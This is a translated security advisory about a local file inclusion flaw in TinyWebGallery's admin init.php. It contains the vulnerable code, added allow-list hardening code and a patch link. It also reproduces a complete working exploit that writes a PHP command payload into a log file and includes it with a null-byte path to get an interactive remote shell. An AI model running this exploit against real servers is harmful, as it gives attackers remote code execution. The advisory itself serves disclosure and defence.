TinyWebGallery /admin/_include/init.php Module Local File Inclusion Vulnerability

Release date: 2009-05-08
Update date: 2009-05-11

Affected systems:
Michael Dempfle TinyWebGallery <= 1.7.6 LFI
Unaffected systems:
Michael Dempfle TinyWebGallery 1.7.7
Description:
BUGTRAQ ID: 34892

TinyWebGallery is an open-source, PHP-based photo gallery.

The /admin/_include/init.php module of TinyWebGallery does not properly validate the $_GET['lang'] parameter of a user request before using it to build a file path:

    110.    // Get Language
    111.    if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__GET']["lang"];
    112.    elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__POST']["lang"];
    113.    else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];  
    114.    else $GLOBALS["language"] = $GLOBALS["default_language"];
    115.    
            [...]
    138.    
    139.    // ------------------------------------------------------------------------------
    140.    // Necessary files
    141.    require _QUIXPLORER_PATH . "/_config/conf.php";
    142.    
    143.    if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
    144.        require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
    145.    else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
    146.        require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
    147.    else
    148.        require _QUIXPLORER_PATH . "/_lang/en.php";

Because the value flows unchecked into the require on line 144, a remote attacker can include arbitrary files. A successful attack requires magic_quotes_gpc = off, since magic quotes would escape the null byte that the published exploit relies on to cut off the ".php" suffix appended to the path.
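As an added illustration of how the language lookup above should be hardened (example code written for this page, not TinyWebGallery's own code and not the vendor's 1.7.7 patch), the following PHP resolves the language code against an allow-list built from the _lang directory instead of testing a user-controlled path with file_exists(). The function name resolve_language and the temporary demo directory are assumptions.

```php
<?php
// Added example (not TinyWebGallery code): resolve the requested language
// from an allow-list instead of building a require path out of user input.
// Assumes language files are named like en.php or pt_BR.php, as in
// _QUIXPLORER_PATH . "/_lang/" above.

function resolve_language($requested, $langDir, $default = 'en')
{
    // 1. A language code is a short string over a fixed alphabet. Checking the
    //    shape first rejects "../", NUL bytes ("%00"), arrays (lang[]=x) and any
    //    path-like value before a path is built, independent of magic_quotes_gpc.
    if (!is_string($requested) || !preg_match('/\A[a-z]{2}(_[A-Z]{2})?\z/', $requested)) {
        $requested = $default;
    }

    // 2. Allow-list: enumerate the directory and accept the code only if a
    //    matching file already exists; file_exists() never sees user input.
    $available = array();
    foreach ((array) glob($langDir . '/*.php') as $file) {
        $available[] = basename($file, '.php');
    }
    if (!in_array($requested, $available, true)) {
        $requested = in_array($default, $available, true) ? $default : 'en';
    }
    return $requested;
}

// init.php would then do (PHP 5 syntax):
//   $GLOBALS['language'] = resolve_language(isset($_GET['lang']) ? $_GET['lang'] : null, _QUIXPLORER_PATH . '/_lang');
//   require _QUIXPLORER_PATH . '/_lang/' . $GLOBALS['language'] . '.php';

// Constructed demo: a temporary _lang directory holding two language files.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/en.php', "<?php // English\n");
file_put_contents($dir . '/de.php', "<?php // German\n");

$inputs = array(
    'de',                        // valid and present      -> de
    'fr',                        // well-formed but absent -> en
    "../../counter/_twg.log\0",  // the advisory's payload -> en
    "de\0",                      // NUL after a valid code -> en
    array('de'),                 // lang[]=de              -> en
);
foreach ($inputs as $in) {
    printf("%-34s -> %s\n", json_encode($in), resolve_language($in, $dir));
}
array_map('unlink', glob($dir . '/*.php'));
rmdir($dir);
```

Running it from the command line prints one line per constructed input; only "de" resolves to itself, every malformed or absent value falls back to the default.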

<*Source: EgiX (n0b0d13s@gmail.com)
  
  Link: http://www.milw0rm.com/exploits/8649
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

<?php

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
      die("\nsocket_create(): " . socket_strerror($s) . "\n");

    if (socket_connect($s, $host, 80) == false)
      die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

    socket_write($s, $packet, strlen($packet));
    while ($m = socket_read($s, 2048)) $response .= $m;

    socket_close($s);
    return $response;
}

function check_target()
{
    global $host, $path;

    $packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";

    preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);

    if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}

function inject_code()
{
    global $host, $path;

    $code     = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
    $payload = "p_user={$code}&p_pass=";

    $packet  = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;

    http_send($host, $packet);
}

print "\n+---------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /twg/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

check_target();
inject_code();

$packet  = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while (1)
{
    print "\ntwg-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}

?>

Recommendations:
Vendor patch:

Michael Dempfle
---------------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

http://www.tinywebgallery.com/download.php?tinywebgallery=latest

This security advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.